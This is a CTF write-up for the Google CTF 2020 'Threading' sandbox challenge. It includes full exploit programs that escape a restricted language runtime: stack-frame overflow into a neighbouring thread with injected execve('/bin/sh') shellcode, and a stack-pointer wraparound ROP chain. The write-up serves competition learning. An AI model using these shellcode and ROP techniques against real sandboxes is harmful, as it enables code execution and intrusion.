hxp | Google CTF Quals 2020: Threading

Mon, 31 August 2020 ~ sisu

Google CTF Quals 2020: Threading

sandbox (314 points, 17 solves)

This task presents us with a custom “constrained” programming language, its runtime and a custom multithreading library. A program compiled in this language does not have direct access to any additional libraries and cannot execute code which does not match the grammar and parsing rules of the language. The solving team needs to provide a malicious program which can escape the constrained environment and read the flag on the system, e.g. by starting a shell.

The language and its runtime

The programming language in this task has few features and is similar to C++. The provided compiler parses the source code, transpiles it to C++ and then uses clang to build the binary which gets executed. The transpiler purposely prefixes each symbol in the source code with stb_ to prevent calling external functions and additionally the grammar limits what C++ features are accessible. The implementation of the transpiler is not expected to contain bugs.

The multithreading library exposes functions for creating and joining threads, and for working with semaphores. The library implements its own thread scheduler, and allocates and maintains the context of each thread. Each thread context is mostly hidden by the implementation of ucontext_t but the thread library is responsible for allocating a stack for each thread. The stack is allocated using mmap and is marked as READ | WRITE | EXECUTE to facilitate exploitation. As a protection mechanism, the virtual page before and after the stack is a guard page and has all access flags removed. The program statement hints that the bug is in the threading library.

Contest solution

Because this is a challenge involving threads, the bug is likely supposed to involve a race condition which leads to targeted memory corruption. However, my solution did not involve searching for a race condition but rather focused on exploiting the compiler and the mechanism for allocating a thread stack.

The provided transpiler translates the program’s source code directly to C++ with few validation checks. One such missing check is the size of the stack frame of a function in the program. Because the language allows for creating large arrays on the stack, a malicious user can allocate large arrays on the stack which leads to a stack overflow (not a stack buffer overflow). The allocation of such buffers can be done through the array<T, SIZE> type in the provided language.

This idea cannot be used directly because the static array is zeroed-out before use which would immediately cause an invalid memory access when the corresponding function is called. To prevent this from happening, one can use two static arrays: a large array to expand the stack frame to cover memory of interest and a small array to overwrite the targetted memory. Because the compiler needs to typically allocate a stack frame for all variables and arrays on the stack, a huge frame would be allocated even if the large buffer never gets used on a program run. By guaranteeing that the large buffer is used late in the function or in an unreachable statement, the portion of memory it uses would never be zeroed-out and thus no memory corruption would occur.

Program's Address Space

The image above shows the relevant parts of the address space of the program and a zoom-in on the region encompassing the two threads’ stacks. The two threads’ stacks are allocated using mmap. Although the there is randomization applied to the base of the mmap region, the relative distance between virtual addresses returned by mmap are mostly deterministic. Thus, the relative distance between the two stacks is the same between runs of the program and the distance can be computed by simply running the program and examining the address space.

On the right side of the image, the idea of hopping into the neighboring thread’s stack is visualized. Thread 1 allocates two buffers on its stack: buffer 1 used for overwriting the other threads stack, and buffer 2 for growing the stack frame sufficiently large to to overlap the other thread’s stack.

The pressure during a CTF contest often leads to messy solutions which have the sole goal of just getting that flag and moving on. Here’s the messy program:

def void ft1(array<char> payload) {
    usleep(30000);
    print("to\n");
    array<char, 2048> ch;
    int32 j = 0;
    while (j < 2048) { 
        if (j < 1912) {
            ch[j] = "A"[0];
        }
        if (j >= 1912) {
           ch[j] = payload[j - 1912]; 
        }
        j = j + 1;
    }
    print("ho\n");
    usleep(1000000);
    array<char, 270200> ch2;
    print("ah\n");
    usleep(1);
    uint32 i = 0;
    while (i < 3) {
        ch2[i] = "B"[0];
        i = i + 1;
    }
    print("FWWWWWWWWWWWWWWWWWW\n");
    usleep(1);
}

def void ft3(int32 depth) {
    print("t3:");
    print(depth);
    print("\n");
    if (depth != 0) {
        ft3(depth - 1);
    }
    if (depth == 0) {
        usleep(100000);
    }
    print("done\n");
}

def void ft2() {

    thread t3 = make_thread(ft3, 40);
    join(t3);
    print("t2\n");
}

def int32 main() {
    print("Hello\n");
    array<char> payload = make_array<char>(1000);
    payload[0] = hex8("f7");
    payload[1] = hex8("97");
    payload[2] = hex8("41");
    int32 i = 8;
    payload[i] = hex8("31");
    i = i + 1;
    payload[i] = hex8("c0");
    i = i + 1;
    payload[i] = hex8("48");
    i = i + 1;
    payload[i] = hex8("bb");
    i = i + 1;
    payload[i] = hex8("d1");
    i = i + 1;
    payload[i] = hex8("9d");
    i = i + 1;
    payload[i] = hex8("96");
    i = i + 1;
    payload[i] = hex8("91");
    i = i + 1;
    payload[i] = hex8("d0");
    i = i + 1;
    payload[i] = hex8("8c");
    i = i + 1;
    payload[i] = hex8("97");
    i = i + 1;
    payload[i] = hex8("ff");
    i = i + 1;
    payload[i] = hex8("48");
    i = i + 1;
    payload[i] = hex8("f7");
    i = i + 1;
    payload[i] = hex8("db");
    i = i + 1;
    payload[i] = hex8("53");
    i = i + 1;
    payload[i] = hex8("54");
    i = i + 1;
    payload[i] = hex8("5f");
    i = i + 1;
    payload[i] = hex8("99");
    i = i + 1;
    payload[i] = hex8("52");
    i = i + 1;
    payload[i] = hex8("57");
        i = i + 1;
    payload[i] = hex8("54");
    i = i + 1;
    payload[i] = hex8("5e");
    i = i + 1;
    payload[i] = hex8("b0");
    i = i + 1;
    payload[i] = hex8("3b");
    i = i + 1;
    payload[i] = hex8("0f");
    i = i + 1;
    payload[i] = hex8("05");
    thread t1 = make_thread(ft1, payload);
    thread t2 = make_thread(ft2);
    join(t2);
    join(t1);
    return 0;
}

In essense, the main thread creates the payload to be injected into the neighboring thread. This is done for the purpose of simplying the implementation of injecting the payload. During the contest I found that buffers were not allocated as expected when uint64 was used as the underlying type, so I needed to hack around something fast.

The program creates three threads and calls usleep as a way to preempt threads and time when the neighboring thread’s stack should be overwritten. The thread, whose stack will be overwritten, enters recursion to allocate multiple stack frames and then sleeps when the bottom of the recursion is reached. The thread, which performs the memory corruption, is awaken. The thread injects the payload into the neighboring’s thread stack and sleeps for a long period before it reaches the statement which uses the very large buffer. This avoids having the buffer be zeroed out which would cause an invalid memory access and kill the process.

The payload can be divided into two parts. The first part, uses a jmp rsp gadget to start executing the data on the stack. It is possible since all stacks are purposely marked as executable. The second part of the payload contains a standard shellcode which executes the execve syscall with /bin/sh passed.

This approach is sufficient to reliably escape the constraints of the language and its runtime.

Post-contest solution

After the contest I decided to polish the solution in order to remove the dependency on creating threads and having an executable stack. The core idea of my original solution is centered at being able to overflow the stack pointer into a memory region at a fixed offset. This idea can be applied also to overflow the main thread’s stack but the offset to other regions, like the image base and mmap base, is not static and thus requires guessing.

A modification of the idea is to have the thread target its own stack since the offset from the writable buffer to the location of the saved RIP is known. Namely, if the program would allocate a sufficiently large buffer, the value of RSP - buffer size would underflow and wrap around to a location where the buffer overlaps the saved RIP. For example, an array of size 2^64 - 32 would cause an underflow which overlaps the saved instruction pointer.

A difficulty in using this method is that the C++ compiler has a limit on the maximum size of an array on the stack which happens to be 2^60. However, this can be worked around by allocating 16 arrays of size 2^60.

Here is the final solution:

def int32 main() {
    array<int64, 603> payload;
    payload[0] = hex64("000000000040c204");
    payload[3] = hex64("00000000004032ac");
    payload[4] = hex64("0000000000416b90");
    payload[5] = hex64("0000000000408145");
    print(payload);
    print("/bin/sh");
    print(364613836481806385);
    if ("A"[0] == "B"[0]) {
        array<char, 1152921504606842104> tmp0;
        array<char, 1152921504606846976> tmp1;
        array<char, 1152921504606846976> tmp2;
        array<char, 1152921504606846976> tmp3;
        array<char, 1152921504606846976> tmp4;
        array<char, 1152921504606846976> tmp5;
        array<char, 1152921504606846977> tmp6;
        array<char, 1152921504606846976> tmp7;
        array<char, 1152921504606846976> tmp8;
        array<char, 1152921504606846976> tmp9;
        array<char, 1152921504606846976> tmp10;
        array<char, 1152921504606846976> tmp11;
        array<char, 1152921504606846976> tmp12;
        array<char, 1152921504606846976> tmp13;
        array<char, 1152921504606846976> tmp14;
        array<char, 1152921504606846976> tmp15;
        int32 i = 0;
        tmp0[i] = 100;
        tmp1[i] = 100;
        tmp2[i] = 100;
        tmp3[i] = 100;
        tmp4[i] = 100;
        tmp5[i] = 100;
        tmp6[i] = 100;
        tmp7[i] = 100;
        tmp8[i] = 100;
        tmp9[i] = 100;
        tmp10[i] = 100;
        tmp11[i] = 100;
        tmp12[i] = 100;
        tmp13[i] = 100;
        tmp14[i] = 100;
        tmp15[i] = 100;
    }
    return 0;
}

The program allocates 16 arrays (tmp0 through tmp15) which are sufficiently large to position the payload onto the saved RIP. The large arrays are stored in an unreachable block to avoid having them set to zero which would crash the program. The strange test of "A"[0] == "B"[0] is added since the compilers fail to determine statically that the branch is never taken for this particular check. Through this, the buffers would be always allocated on the stack but no zeroing would occur.

The payload is the following ROP chain:

Reposition the stack.
```
pop r12
pop rbp
ret
```
Set RDI to point to /bin/sh.
```
pop rdi
ret
```

Because the program itself doesn’t contain the string, I deliberately added a print statement with /bin/sh.

Execute the instructions at the location where the printed value 364613836481806385 is stored. 364613836481806385 translates to:
```
xor eax, eax
mov al, 0x3b
pop rdx
pop rsi
syscall
```

This solution only relies on knowing the location of the image base and makes no assumptions on having an executable stack.

Conclusion

Designing a CTF challenge, with a single intended solution, often requires many iterations of tweaks and polishing which can be extremely time-consuming and sometimes unrewarding. Although this challenge had “unintended” solutions, I suppose neither of them were trivial. There was clearly lots of effort put into designing this challenge, and surely both the author and teams have enjoyed skimming through the infrastructure for it.